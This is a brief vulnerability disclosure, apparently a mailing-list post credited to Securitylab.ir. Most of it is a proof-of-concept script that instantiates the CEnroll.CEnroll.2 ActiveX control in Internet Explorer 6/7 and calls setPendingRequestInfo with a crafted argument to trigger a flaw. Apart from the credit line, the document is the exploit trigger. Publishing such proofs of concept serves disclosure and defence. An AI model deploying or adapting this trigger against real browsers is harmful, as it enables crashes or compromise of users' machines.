PoC: <script language=javascript> try { var tar = new ActiveXObject('CEnroll.CEnroll.2'); var a="sl"; tar.setPendingRequestInfo(0x05050505,a,a,a); } catch(sl){} </script> Tested on IE 6/7 Discovered by: Securitylab.ir (Kamran_st@xxxxxxxxx) Homepage: http://Securitylab.ir